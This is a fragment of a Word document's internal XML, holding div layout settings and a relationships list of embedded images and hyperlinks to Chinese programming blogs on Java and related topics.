          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2033988828">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1676688427">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1475829379">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1890066753">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1205093078">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="984702947">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="875626789">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="990257813">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1740248647">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1712413201">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1756976370">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="798256522">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1388991832">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1899591897">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="119035120">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="594872367">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1949845124">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="393772170">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1439789898">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2041778586">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="298653387">
          <w:marLeft w:val="113"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1181163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137903">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2059620587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2037998375">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2070418864">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2077389089">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2045133772">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="259528001">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="12" w:space="5" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="499582809">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1497837418">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="12" w:space="5" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="208419578">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1473597679">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="12" w:space="5" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1439642081">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="635374121">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="12" w:space="5" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="80221143">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="811479147">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="12" w:space="5" w:color="6CE26C"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2092657127">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="341781303">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2117285569">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2126577946">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21444241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lib.csdn.net/base/20" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ablanxue.com/shtml/201207/776.shtml" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/corson/archive/2012/01/04/2311974.html" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://javaeyetodj.iteye.com/blog/969635" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://netsecurity.51cto.com/art/200812/102925.htm" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/956602.htm" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.gif"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://langyu.iteye.com/blog/684087" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Consistent_hashing" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9rHbkrHR1ryn1rjRduj-W0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6K1TL0qnfK1TL0z5HD0IgF_5y9YIZ0lQzqlpA-bmyt8mh7GuZR8mvqVQL7dugPYpyq8Q1RsnHT3PW03P0" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E7%BA%BF%E7%A8%8B&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/bjash/article/details/8596538" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/kf/201207/139522.html" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpeg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://boy00fly.iteye.com/blog/1139845" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=DDOS%E6%94%BB%E5%87%BB&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9nWF9nWRdmhF9rj-WnjP90ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6K1TL0qnfK1TL0z5HD0IgF_5y9YIZ0lQzqlpA-bmyt8mh7GuZR8mvqVQL7dugPYpyq8Q1fdPjmknHR3nWT4rjmzrjTvPf" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/2554947.htm" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/turkeyzhou/article/category/365505/2" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.blogjava.net/qileilove/archive/2013/09/23/404308.html" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.jb51.net/article/48304.htm" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/prince2270/article/details/5891085" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpeg"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 